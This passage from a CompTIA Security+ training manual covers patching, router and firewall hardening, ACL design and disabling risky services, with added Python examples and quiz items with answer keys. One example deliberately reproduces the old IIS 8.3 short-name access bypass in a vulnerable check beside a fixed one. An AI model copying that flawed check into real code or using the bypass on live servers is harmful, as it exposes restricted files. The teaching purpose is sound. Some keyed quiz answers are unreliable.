                                My Console

                            22 Click Yes                               To save the security template.

              Installing and configuring file encryption capabilities
Explanation   File encryption features, supported by certain operating systems, are useful if the
              operating system’s access controls are not adequate to maintain the confidentiality of
              file contents. Certain operating systems do not support access control lists; this might
              make it necessary to deploy file encryption features. Encryption is a very resource-
              consuming feature; therefore, the benefits of using it should be carefully weighed
              against the risks of not using it.

              Updates, patches, and service packs
              Due to the complexity of operating systems, security-related problems are often
              identified only after the OS has been released. Furthermore, it takes even more time for
              consumers to become aware of the problem, obtain the necessary patches, and install
              them on their systems. This gap gives potential intruders an opportunity to exploit the
              discovered security breach and launch related attacks on the system.
              To contain such risks, system administrators should keep track of security-related
              announcements that may apply to their systems. Depending on how critical the exposure
              is, the administrator may choose to disable the affected software until a solution (patch)
              can be applied to address the risk. Permanent fixes from vendors should be applied as
              they are made available. The following sections describe a systematic approach for
              addressing such issues.

              Establish procedures for monitoring security-related information
              Subscribing to mailing lists can enable administrators to receive important security-
              related announcements and to keep up with new developments and updates specific to
              their systems. There are also certain security-related sites, such as CERT or SANS, that
              educate users on industry best practices for security-related issues. Administrators may
              also seek out and monitor more discreet hacker sites, where exploits may appear prior to
              posting on a vendor site.

              Evaluate updates for applicability
              Certain software updates may not be applicable to a given system’s configuration or to
              an organization’s security requirements. System administrators should evaluate all the
              updates to determine their applicability to a given system’s configuration before
              actually applying them to their systems. An up-to-date paper log of each system can
              help you quickly determine the applicability of a patch. Tests should be conducted in a
              lab environment to assess the effect of an update on a system’s configuration.

              Plan the installation of applicable updates or patches
              The installation of an update or patch can itself cause security problems unless
              administered systematically based on a predefined plan. An inappropriately scheduled
              update might make information resources unavailable when needed by the system
              members. Furthermore, if an update must be performed on a large network, updates can
              lead to different and potentially incompatible versions of software on different parts of
              the network; this situation could cause information loss or corruption. The system might
              temporarily be placed in a more vulnerable state.

                    Updates can also cause problems in other installed software within the system;
                    therefore, an update should be tested thoroughly in a test environment before being
                    applied to production systems. If an update must be done on a live system, then
                    schedule it during a period of light load, and ensure that sufficiently skilled personnel
                    are available to back up critical files, to update and test the system, and to return the
                    system to the original configuration if problems occur.
                    Methods of updating a system depend on the topology of a system. System
                    administrators can manually update small systems with a limited number of computers
                    and workstations. However, depending on how big the network is, administrators may
                    need to employ automated tools to apply software updates to a large number of
                    computers. Updates that are conducted in an unsystematic and haphazard way could
                    introduce new vulnerabilities to networks.

                    Install updates using a documented plan
                    In this step, system administrators follow a documented plan to apply the necessary
                    software updates, using some or all of the tactics described in the previous section. The
                    update plan as well as the necessary back-out procedures should be documented before
                    the system is updated.

                    Deploy new systems with the latest software
                    It’s important to make sure that new installations are compatible with planned upgrades.
                    The hard log should include a list of updates installed on existing systems, and the
                    administrator should keep an archive of required files, so that the new systems can be
                    deployed with the most updated software.
                    It’s also recommended that system administrators install the most up-to-date driver
                    software for all applications and system components. Those drivers typically address
                    performance and security issues and are made available to the public as problems are
                    discovered and resolved.
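                    The "evaluate updates for applicability" and "install using a documented plan" steps
                    above, as an added worked example (not code from the course): the per-system log the
                    text recommends is modelled as data, each vendor advisory names a product and an
                    affected version range, and the function returns the advisories that apply to a system
                    and are not yet recorded as installed, most severe first. System names, product names,
                    versions and advisory identifiers are all constructed for the illustration.

```python
"""Match vendor advisories against a system inventory log.

Constructed example, not from the course.  Versions are compared as tuples of
integers so that 2.0.10 is correctly newer than 2.0.9 (a string compare would
get this wrong).
"""


def parse_version(text):
    """'5.2.3790' -> (5, 2, 3790) for numeric comparison."""
    return tuple(int(part) for part in text.split("."))


# Constructed inventory log: installed products with versions, and the patches
# already applied to each system.
INVENTORY = {
    "fileserver01": {
        "products": {"nos": "5.2.3790", "backup-agent": "3.1.0"},
        "installed_patches": {"VEND-0001"},
    },
    "web01": {
        "products": {"nos": "5.2.3790", "httpd": "2.0.52"},
        "installed_patches": set(),
    },
}

# Constructed advisories: product, inclusive affected version range, severity.
ADVISORIES = [
    {"id": "VEND-0001", "product": "nos", "affected": ("5.2.0", "5.2.3790"), "severity": "high"},
    {"id": "VEND-0002", "product": "httpd", "affected": ("2.0.0", "2.0.58"), "severity": "critical"},
    {"id": "VEND-0003", "product": "httpd", "affected": ("2.2.0", "2.2.9"), "severity": "high"},
    {"id": "VEND-0004", "product": "backup-agent", "affected": ("3.1.0", "3.1.4"), "severity": "low"},
]

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def is_affected(installed, affected_range):
    """True when the installed version lies inside the advisory's range."""
    low, high = (parse_version(v) for v in affected_range)
    return low <= parse_version(installed) <= high


def applicable_updates(system_name, inventory=INVENTORY, advisories=ADVISORIES):
    """Advisory ids that apply to one system and are not yet installed,
    ordered most severe first so the update plan can be sequenced."""
    system = inventory[system_name]
    hits = []
    for adv in advisories:
        installed = system["products"].get(adv["product"])
        if installed is None:
            continue                      # product not present: not applicable
        if adv["id"] in system["installed_patches"]:
            continue                      # already applied according to the log
        if is_affected(installed, adv["affected"]):
            hits.append(adv)
    hits.sort(key=lambda a: SEVERITY_RANK[a["severity"]])
    return [a["id"] for a in hits]


def update_plan(inventory=INVENTORY, advisories=ADVISORIES):
    """Every logged system mapped to its outstanding applicable updates."""
    return {name: applicable_updates(name, inventory, advisories) for name in inventory}


if __name__ == "__main__":
    for system, updates in update_plan().items():
        print(f"{system}: {updates or 'up to date'}")
```

                    The output is the starting point for the documented plan: what to test in the lab for
                    each system, in what order, and which systems already carry the fix.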

Do it!   A-4:   Discussing file system security
          Questions and answers
          1 Which of the following is not required for securing file systems?
            A    Create the necessary user groups.
            B    Configure access controls.
            C    Configure file encryption.
            D    Avoid drive partitions.

          2 System administrators should disable ___________ permissions for all executable
            files and binary files.

            Write/Execute

          3 Which of the following are privileges that can be set on an object?
            A    Read
            B    Write
            C    Execute
            D    All of the above

          4 When you’re setting file system permissions, individual user accounts should be
            assigned access whenever possible. True or false?

            False. The principle of least privilege should be applied.

          5 Which of the following are common practices for setting file and data privileges?
            A    Restrict access of operating system source files, configuration files, and their
                 directories to authorized system administrators.
            B    Establish all log files as “append only” if that option is available.
            C    Prevent users from installing, removing, or editing scripts without
                 administrative review. Otherwise, malicious users could exploit these files to
                 gain unauthorized access to data and system resources.
            D    Pay attention to access control inheritance when defining categories of files
                 and users.
            E    All of the above.


Topic B: Network hardening
                    This topic covers the following CompTIA Security+ exam objectives:

                     #     Objective

                     2.5   Recognize and understand the administration of the following file transfer protocols and
                           concepts
                            • Vulnerabilities
                                • 8.3 Naming Conventions

                     3.5   Understand the following concepts of Security Baselines, be able to explain what a Security
                           Baseline is, and understand the implementation and configuration of each kind of intrusion
                           detection system
                            • Network Hardening
                                • Updates (Firmware)
                                • Configuration
                                   • Enabling and Disabling Services and Protocols
                                   • Access Control Lists




                    Handling global network access
 Explanation        E-commerce and advances in information communications require today’s networks to
                    be globally accessible, thereby posing new challenges for security auditors. Businesses
                    must let customers and trading partners into the network; the trade-off, unfortunately, is
                    that such network designs are also very attractive for hackers and cyber-terrorists. Using
                    malicious tools available on the Internet, attackers can penetrate a network, take control
                    of routers and switches, obtain or destroy confidential information, and embed viruses,
                    Trojans, or backdoors into critical business applications. Networks are also susceptible
                    to outages that can have a negative impact on customer and trading partner
                    relationships. Business continuity is an essential ingredient in any e-commerce
                    environment. It’s therefore crucial to have a network with availability as well as with
                    adequate security.

                    Firmware updates
                    Generally speaking, firmware is programming that is written into erasable
                    programmable read-only memory (EPROM), thus becoming a permanent part of a
                    computing device. Examples of firmware are the PC system BIOS and router and
                    switch boot code.
                    Firmware is created and tested like software (using microcode simulation). Firmware
                    updates can be made available by the vendors as vulnerabilities and malfunctions are
                    discovered within previous versions. When ready, such updates can be distributed like
                    other software and, using a special user interface, installed in the programmable read-
                    only memory by the user. Administrators should keep track of vendor announcements to
                    determine if they apply to their systems, and upgrade firmware on their network devices
                    as suggested by vendors.

Network configuration
Networks typically facilitate data transmission by a process called routing. Routing is
the process of deciding the disposition of each packet that a router receives, and then
either forwarding or discarding the packet. Routers store destination addresses in a
data structure called the routing table, which can be updated dynamically through
interactions with other routers. The routing mechanism decides whether to forward or
discard a packet by using the destination IP address in the packet header.
Routing functions and supporting structures are designed to route packets efficiently
and reliably, not securely. Therefore, a routing process should not be used to implement
security policy. Rather, firewall systems should govern security of information flow into
and out of the network. Most firewall systems’ routing configurations are static, and
hence less receptive to attacks.

Assigning network addresses for interfaces on a firewall device
Each network to which a firewall device is attached has a procedure to obtain new IP
addresses. For the Internet, IP addressing is typically obtained from the Internet service
provider (ISP) that connects to the firewall. For internal networks, including configured
demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within
the organization. The IP addresses used internally typically come from the RFC 1918 IP
address specification, which is not routable across the Internet without necessary
translation.

Establishing the routing configuration
A firewall system’s routing table contains a list of IP addresses for which the firewall
system provides routing services. The routing decision is made based on the destination
network address of the data packet being processed by the firewall. If the destination
address exists in the routing table, the table provides the address of the next hop. If there
is no next hop associated with the destination, the packet is discarded. An Internet
Control Message Protocol (ICMP) “unreachable” message, indicating that the packet
was undeliverable, may be returned to the source.
When you’re replacing an existing firewall system, it’s important to understand the
network topology described by the routing configuration. The routing configuration of
the new firewall system must be consistent with the current system.
An organization’s network security policy should require that the routing configuration
of a firewall system be performed in an environment isolated from the production
network. This policy should also specify what connectivity is to be permitted with the
specific statements and deny all other connectivity.
The routing configuration is derived from the network topology and should not be used
to implement aspects of an organization’s security policy. Some firewall designs
implement a two-tier firewall architecture with a DMZ so that all inbound and outbound
packets travel through both firewall systems. In these designs, the outside firewall is
typically configured with more general packet-filtering rules. As packets move toward
the internal network, filtering rules become more specific and complex.
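The routing decision described under "Establishing the routing configuration", as an
added worked example (not code from the course): a table of destination prefixes is
searched longest-prefix first, a hit yields the next hop and interface, and a destination
with no next hop is discarded with an ICMP "unreachable" notice recorded for the
source. The prefixes, next hops and interface names are constructed; the public
addresses come from the documentation ranges.

```python
"""Longest-prefix-match routing lookup with discard/ICMP-unreachable handling.

Constructed example, not a real router's code.  A route whose next hop is None
models a destination the firewall knows but has no next hop for (a null route),
which the text says is discarded.
"""
import ipaddress


class RoutingTable:
    def __init__(self):
        self.routes = []          # (network, next_hop or None, interface)

    def add(self, prefix, next_hop, interface):
        self.routes.append((ipaddress.ip_network(prefix), next_hop, interface))
        # Most specific prefix first, so the first match is the longest match.
        self.routes.sort(key=lambda r: r[0].prefixlen, reverse=True)

    def lookup(self, dst):
        """Return (next_hop, interface) for the best route, or None if no route."""
        addr = ipaddress.ip_address(dst)
        for net, next_hop, iface in self.routes:
            if addr in net:
                return next_hop, iface
        return None


def forward(table, pkt):
    """Return ('forward', next_hop, iface) or ('discard', icmp_message, None)."""
    hit = table.lookup(pkt["dst"])
    if hit is None or hit[0] is None:
        # No route, or a route with no next hop: drop and tell the sender.
        msg = f"ICMP destination unreachable sent to {pkt['src']} for {pkt['dst']}"
        return ("discard", msg, None)
    next_hop, iface = hit
    return ("forward", next_hop, iface)


def build_sample_table():
    """Constructed firewall routing table: static default, two inside nets,
    one more-specific subnet, and a null route for unused private space."""
    t = RoutingTable()
    t.add("0.0.0.0/0", "198.51.100.1", "outside")           # default via the ISP
    t.add("192.168.10.0/24", "192.168.10.1", "inside")
    t.add("192.168.20.0/24", "192.168.20.1", "dmz")
    t.add("192.168.10.128/25", "192.168.10.130", "inside")  # longer prefix wins
    t.add("10.0.0.0/8", None, "null")                       # no next hop: discard
    return t


if __name__ == "__main__":
    table = build_sample_table()
    for dst in ("192.168.10.200", "192.168.10.20", "203.0.113.5", "10.9.9.9"):
        print(dst, forward(table, {"src": "198.51.100.7", "dst": dst}))
```

Because the table is sorted by prefix length, a packet for 192.168.10.200 goes to the /25
gateway rather than the /24 one; the ordering, not the security policy, determines the
path, which is the point the text makes about keeping routing and filtering separate.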

                    Best practices for routers and firewalls
                    Following are common best practices that should be taken into account when you’re
                    configuring router and firewall systems:
                        • It’s very important to keep a copy of the current configurations of the network
                           devices at a safe location on your network. Attacks, power outages, and
                           configuration changes that may produce unexpected results might necessitate
                           configuration backups.
                        • Never allow IP-directed broadcasts through the system. Smurf attacks may
                           exploit this vulnerability.
                        • Configure devices with meaningful host names to make it easy to troubleshoot
                          problems within the network. IP addresses without names prolong
                          troubleshooting efforts, causing inefficient utilization of resources and time.
                          Because not all software can handle uppercase correctly, lowercase naming
                          conventions scale better.
                        • Always use a description for each interface. It’s a good practice to use the circuit
                          number as part of the description for wide area network (WAN) links.
                        • Always specify bandwidth on the interfaces even if it’s not needed. Certain
                          routing protocols use bandwidth information to calculate the routing metrics
                          when building their routing tables.
                        • Always configure a loopback address. Because the loopback interface is a
                          logical interface, depending on the topology of the network, you can still access
                          a device using a loopback interface regardless of the status of the primary
                          physical interface. The use of a logical interface could also provide redundant
                          paths to conduct Simple Network Management Protocol (SNMP) polling. A
                          stable interface is very important for protocols such as Systems Network
                          Architecture (SNA), which is very sensitive to time delays and outages.
                        • Despite its benefits in managing a network, SNMP can be very dangerous if not
                          handled with proper care. An SNMP agent together with a set of SNMP
                          application entities is known as an SNMP community. SNMP has two types of
                          communities: Read Only and Read/Write. If the associated password is
                          compromised, hackers can exploit the Read/Write community to execute
                          unauthorized configuration changes.
                        • Avoid using common words for password and naming schemes. Dictionary-
                          based password crackers can be used by malicious users to take advantage of
                          such practices.
                        • Using tools such as SYSLOG, deploy logging throughout your network to
                          collect information about interface status, events, and debugging and to place
                          that information on a central logging server. Even if a hacker were able to
                          modify the logs of a compromised system, he or she would then also need to
                          break into the SYSLOG server to get that copy.
                        • Restrict data traffic to required ports and protocols only.

Access control lists
An access control list (ACL) is a set of statements that controls the flow of packets
through a device based on certain parameters and information contained within a packet.
An ACL implements a certain type of security policy for an organization. For instance,
if an organization doesn’t want employees to use FTP across the Internet, the
organization can institute a restriction by placing an access list on the corresponding
interface. The access list would then enable the implementation of this policy. An access
control list should not be considered a policy by itself.
ACLs implement packet filtering. Packet filtering is the process of deciding the
disposition of each packet that can possibly pass through a router. IP filtering provides
the basic protection mechanism for a routing firewall device through inspection of
packet contents. This process governs what traffic passes through the device, thereby
potentially limiting access to each of the networks controlled by the firewall. The
determination of such filtering rules and their placement within the network can be
complex depending on the topology of the network. For a router that implements packet
filtering, the routing process might have multiple points where ACLs are applied.
Inbound data packets are typically inspected on arrival at the filtering device. Departing
packets, on the other hand, are usually subject to filtering rules immediately before a
packet is transmitted out of the device. Different rule sets might be used at each point
where filtering is applied. If certain components of the organization’s security policy
cannot be implemented via ACLs, administrators should evaluate additional security
tools, such as intrusion detection devices or proxies.
Packet-filtering rules, implemented by ACLs, can be designed based on intrinsic or
extrinsic information pertaining to a data packet. Intrinsic information is contained
within the packet itself, such as source address, destination address, protocol, source
port, destination port, packet length, and packet payload, which is the actual data.
Extrinsic information exists outside of a data packet. This information can include the
arrival/departure interface on the device, the context maintained by the firewall software
that pertains to a packet, and the date and time of packet arrival or departure.
In general, packet filters cannot reference extrinsic information. ACLs are generally
designed to implement separate sets of rules for different interfaces, sometimes with
separate sets for arriving and departing packets. By placing a given rule in the
appropriate interface’s rule set, you are using extrinsic information in the rules’ design.
Following are well-known best practices for designing filtering rules for new networks:
    • ACLs typically implement implicit denials at the end of a rule set. When applied
      on an interface, an implicit denial causes all packets to be denied unless there are
      explicit permissions. It’s a good practice to explicitly add the “deny all” rule to
      articulate the security policy of the organization more completely.
    • Design antispoofing rules, and place them at the top of the ACL.
    • Identify protocols, ports, and source and destination addresses that need to be
      serviced in your network. Make sure these requirements abide by your
      organization’s security policy.
    • Configure the filtering rule set of the ACL by protocol and by port.
    • Collapse rows that match on the same protocol, and rows for consecutive ports,
      into a single row that specifies a range. This reduces the number of rules and
      hence increases processing efficiency.
    • Place all permission rules between the antispoofing rules and the “deny all” rule
      at the end of the rule set.
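The rule ordering just listed, as an added worked example (not code from the course and
not any vendor's ACL syntax): antispoofing denies for RFC 1918 and loopback sources sit
at the top of the inbound rule set for the outside interface, permits follow ordered by
protocol and port, and an explicit "deny all" closes the set; a packet that matches nothing
still falls to the implicit deny. The function `collapse_ports` shows the range-collapsing
step. The internal network, the DMZ web server address and the policy itself are
assumptions made for the illustration.

```python
"""First-match packet filter with antispoofing rules first and deny-all last.

Constructed example, not from the course.  Packets are dicts with proto, src,
dst and (for TCP/UDP) dport.
"""
import copy
import ipaddress

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
DMZ_WEB = ipaddress.ip_address("203.0.113.10")     # assumed DMZ web server


class Rule:
    def __init__(self, action, proto="any", src="0.0.0.0/0", dst="0.0.0.0/0",
                 ports=None, name=""):
        self.action = action                  # "permit" or "deny"
        self.proto = proto                    # "any", "tcp", "udp", "icmp"
        self.src = ipaddress.ip_network(src)
        self.dst = ipaddress.ip_network(dst)
        self.ports = ports                    # None = any port, else (low, high)
        self.name = name

    def matches(self, pkt):
        if self.proto != "any" and self.proto != pkt["proto"]:
            return False
        if ipaddress.ip_address(pkt["src"]) not in self.src:
            return False
        if ipaddress.ip_address(pkt["dst"]) not in self.dst:
            return False
        if self.ports is not None:
            low, high = self.ports
            if not low <= pkt["dport"] <= high:
                return False
        return True


def build_inbound_acl():
    """Inbound rule set for the outside interface (assumed policy)."""
    rules = []
    # 1. Antispoofing first: private or loopback sources never arrive from the Internet.
    for net in RFC1918:
        rules.append(Rule("deny", src=str(net), name=f"antispoof {net}"))
    rules.append(Rule("deny", src="127.0.0.0/8", name="antispoof loopback"))
    # 2. Permits, grouped by protocol and port.
    rules.append(Rule("permit", "tcp", dst=f"{DMZ_WEB}/32", ports=(80, 80), name="web http"))
    rules.append(Rule("permit", "tcp", dst=f"{DMZ_WEB}/32", ports=(443, 443), name="web https"))
    rules.append(Rule("permit", "icmp", dst=f"{DMZ_WEB}/32", name="web ping"))
    # 3. Explicit deny-all: same effect as the implicit deny, but it states the policy.
    rules.append(Rule("deny", name="deny all (explicit)"))
    return rules


def evaluate(rules, pkt):
    """First matching rule decides; with no match the implicit deny applies."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action, rule.name
    return "deny", "implicit deny"


def collapse_ports(rules):
    """Merge adjacent rules that differ only by consecutive ports into range rules."""
    out = []
    for r in rules:
        prev = out[-1] if out else None
        if (prev is not None and prev.action == r.action and prev.proto == r.proto
                and prev.src == r.src and prev.dst == r.dst
                and prev.ports is not None and r.ports is not None
                and r.ports[0] == prev.ports[1] + 1):
            prev.ports = (prev.ports[0], r.ports[1])
            prev.name = f"{prev.action} {prev.proto} ports {prev.ports[0]}-{prev.ports[1]}"
        else:
            out.append(copy.copy(r))      # copy so the caller's rules are untouched
    return out


if __name__ == "__main__":
    acl = build_inbound_acl()
    for pkt in ({"proto": "tcp", "src": "192.168.10.5", "dst": "203.0.113.10", "dport": 80},
                {"proto": "tcp", "src": "198.51.100.7", "dst": "203.0.113.10", "dport": 443},
                {"proto": "tcp", "src": "198.51.100.7", "dst": "203.0.113.10", "dport": 22}):
        print(pkt["src"], pkt["dport"], evaluate(acl, pkt))
```

Because placement decides the outcome, a permit for port 80 placed above the antispoofing
rules would let a spoofed internal source through; keeping the order above is what makes
the rule set enforce the policy.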

Do it!              B-1:    Discussing network hardening
                     Questions and answers
                      1 ____________ is a logical interface that is not tied to any physical interface.

                        Loopback

                      2 ____________ is a function of IP routing that allows the packet originator to
                        influence routing decisions as the packet traverses networks.

                        Source routing

                      3 Smurf attacks can be thwarted by disallowing ____________ ____________ on
                        routers.

                        IP-directed broadcasts

                      4 For best security on routers, never configure a loopback address. True or false?

                        False. Always configure a loopback address. The loopback interface allows you to access a
                        device regardless of the status of the primary physical interface.

                      5 The SNMP ____________ community string can be used to make changes in a
                        router configuration.

                        Read/Write

                      6 SNMP has two types of communities. Identify them from the list provided.
                        A    Router Access Only
                        B    Read Only
                        C    Random Access Only
                        D    Read/Write

                      7 ____________ is a useful feature to allow TCP data packets into your internal
                        network, given that the data traffic is initiated from your internal network.

                        Filtering
                                                                            Security baselines   13–19

              Disabling services and protocols
Explanation   Many services are vulnerable to Internet-based attacks, which have caused nightmares
              for system administrators over the years. To support novice administrators, many server
              operating systems are now packaged with a variety of software and installers, which
              start these services automatically. Every service should be evaluated for need and risks.
              Any services that are unnecessary should be removed. Those that are required should be
              evaluated and installed in a way that lowers potential risks. As a system administrator,
              you must become familiar with such services and take appropriate precautions to
              mitigate the risks associated with them.

              RPC
              Remote Procedure Call (RPC) is one of the most commonly exploited services on the
              Internet today. RPC essentially permits a computer to execute a program on another
              computer. RPC Portmapper, which attackers query during reconnaissance, returns
              information about all RPC network services configured to run on your host systems.
              When a distributed application requires RPC service, it should be allowed only
              through secure access methods such as VPN. Otherwise, RPC services should be
              disabled by blocking access to the corresponding ports on the Internet border
              routers. Network File System (NFS), the UNIX-based file-sharing mechanism, is also
              vulnerable to such attacks and therefore should be blocked from the Internet.

              Web services
              Like RPC, Web services are also commonly exploited by Internet-based attacks.
              However, unlike with RPC, most companies need to permit the HTTP protocol for
              access to hosted Web services. Most of the risk associated with servicing Web traffic
              results from either the deployment of outdated Web servers or the use of third-party
              applications with documented vulnerabilities. System administrators can prevent such
              vulnerabilities with proper research and configuration.

              SMTP, SNMP, and FTP
              Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol
              (SNMP), and FTP services provide avenues for most of the remaining Internet-based
              attacks.
                  • SMTP is the industry-standard protocol used for electronic mail. Most
                    SMTP-specific vulnerabilities result from unapplied or misapplied patches
                    related to Sendmail installations or misconfigured Sendmail daemons.
                  • SNMP is used for remote management of devices across a network. There is
                    usually no reason to allow network management from the Internet. If system
                    administrators must have remote network management capability, it’s
                    suggested that SNMP be accomplished via VPN access.
                  • Anonymous FTP service allows anyone from the Internet to access internal FTP
                    servers, either to upload or download data. Such practices should be disallowed
                    unless there is a critical business need.
              Denial-of-service (DoS) attacks are commonly executed against systems whose
              configuration lacks the necessary protective settings. Such attacks have caused
              tremendous financial damage to many companies; the damage ranges from loss of
              business to even bankruptcy in certain cases. While it’s difficult to completely
              forestall any denial-of-service attack, carefully configuring your Internet devices
              can minimize the likelihood of being a target.

                    The most common reason for successful DoS attacks is the presence of unnecessary
                    services running on network devices. For instance, Bootstrap Protocol, a service used to
                    distribute IP addresses to clients, is almost never needed and should be disabled on all
                    devices. Also, vulnerabilities associated with certain services can be fixed with patches
                    provided by vendors. Certain FTP servers suffer from a buffer overflow vulnerability
                    that can be easily fixed with patches. Administrators should disable all services that are
                    not needed for Internet-based operations. Furthermore, services such as DNS that
                    are necessary for Internet connectivity should be properly reviewed, configured,
                    and monitored.

                    Internet Information Service (IIS)
                    Microsoft IIS 4.0 and earlier has a security hole related to web files that don’t use the
                    DOS 8.3 naming convention. Files stored using the long file name convention can be
                    accessed even if they’re restricted via IP address or through the use of SSL by simply
                    requesting the file in DOS 8.3 format. For example, if a file is named
                    MyConfidentialFile.htm, then a hacker can request MyConf~1.htm and be granted
                    access to the file. This security hole has been fixed in IIS versions above 4.0.
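The flaw described above reduced to its access-control logic, as an added example (not the manual's code, and not a model of IIS itself): an ACL keyed on the literal request string beside the hardened version that canonicalizes the name first. The site files and roles are constructed, and the 8.3 short-name generator is a simplified approximation of what Windows does.

```python
import os
import re

# Constructed sample site (not from the manual): files on disk, and an ACL keyed
# by long file name, which is how the restricted file was meant to be protected.
FILES = {"index.htm", "MyConfidentialFile.htm"}
RESTRICTED = {"MyConfidentialFile.htm": {"trusted_admin"}}   # name -> roles

def short_name(long_name):
    """Approximate the DOS 8.3 alias Windows generates for a long file name.
    Simplified: keeps only letters and digits, always uses the ~1 suffix, and
    ignores the collision counter real Windows would apply."""
    base, ext = os.path.splitext(long_name)
    base = re.sub(r"[^A-Za-z0-9]", "", base).upper()
    ext = re.sub(r"[^A-Za-z0-9]", "", ext).upper()
    if len(base) > 8:
        base = base[:6] + "~1"
    return f"{base}.{ext[:3]}" if ext else base

def resolve(requested):
    """Case-insensitive lookup that, like NTFS, accepts a long or 8.3 name."""
    want = requested.lower()
    for name in FILES:
        if want in (name.lower(), short_name(name).lower()):
            return name
    return None

def can_read_vulnerable(requested, roles):
    """IIS 4.0-style check: the ACL is consulted with the literal request
    string, so an 8.3 alias of a restricted file never matches the ACL entry
    and the file system then serves it anyway."""
    if requested in RESTRICTED and not (RESTRICTED[requested] & roles):
        return False
    return resolve(requested) is not None

def can_read_fixed(requested, roles):
    """Hardened check: canonicalize the request to the real file name first,
    then apply the ACL to that canonical name."""
    canonical = resolve(requested)
    if canonical is None:
        return False
    if canonical in RESTRICTED and not (RESTRICTED[canonical] & roles):
        return False
    return True
```

The general lesson is the one the fix applies: authorize the resource the file system will actually open, not the string the client sent, because any alias (short names, case variants, alternate encodings) breaks a check done on the raw request.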

Do it!              B-2:     Managing services and protocols with Windows
                             Server 2003 security templates
                     Here’s how                                  Here’s why
                      1 Choose Start, Run…                       To apply a Windows Server 2003 security
                                                                 template and evaluate the results.

                                                                 Microsoft offers security templates at three
                                                                 primary levels: basic, secure, and high secure.
                                                                 The issues surrounding the use of these
                                                                 templates are unknown. Because the
                                                                 administrator is relying on Microsoft to secure
                                                                 the server, the settings are difficult to track.

                      2 Type mmc and press Enter

                      3 Choose File, My Console.msc              To open the previously created mmc con